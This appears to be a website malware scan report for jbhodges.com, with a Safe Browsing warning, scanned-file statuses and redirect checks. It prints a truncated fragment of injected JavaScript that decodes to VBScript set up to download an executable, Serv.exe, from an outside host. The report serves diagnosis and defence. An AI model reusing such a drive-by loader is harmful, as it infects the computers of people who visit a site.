Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jbhodges.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jbhodges.com/ | 200 OK Content-Length: 37439 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var YesVB ='%3Ctitle%3E%3C/title%3E%0D%0A%3Chead%3E%3C/head%3E%0D%0A%0D%0A%3Cbody%3E%0D%0A%0D%0A%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%0D%0Aon%20error%20resume%20next%0D%0A%0D%0A%0D%0A%0D%0A%27%20due%20to%20how%20ajax%20works%2C%20the%20file%20MUST%20be%20within%20the%20same%20local%20domain%0D%0Adl%20%3D%20%22http%3A//server1.host-sa.com/~eltarbia/html/cache/Serv.exe%22%0D%0A%0D%0A%27%20create%20adodbstream%20object%0D%0ASet%20df%20%3D%20document.createElement%28%22object%22%29%0D%0Adf. function SetNewYesVB(){ var NewYesVB; NewYesVB = unescape(YesVB); document.write(NewYesVB); } ; SetNewYesVB(); Antivirus reports:
| ||
http://jbhodges.com/i.js | 404 Not Found Content-Length: 321 Content-Type: text/html | clean |
http://jbhodges.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jbhodges.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 17:04:13 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 37439
Content-Type: text/html
Last-Modified: Sun, 01 Jun 2008 15:24:32 GMT
...37439 bytes of data.
GET / HTTP/1.1
Host: jbhodges.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 17:04:13 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 37439
Content-Type: text/html
Last-Modified: Sun, 01 Jun 2008 15:24:32 GMT
...37439 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jbhodges.com
Referer: http://www.google.com/search?q=jbhodges.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jbhodges.com
Referer: http://www.google.com/search?q=jbhodges.com
Result:
The result is similar to the first query. There are no suspicious redirects found.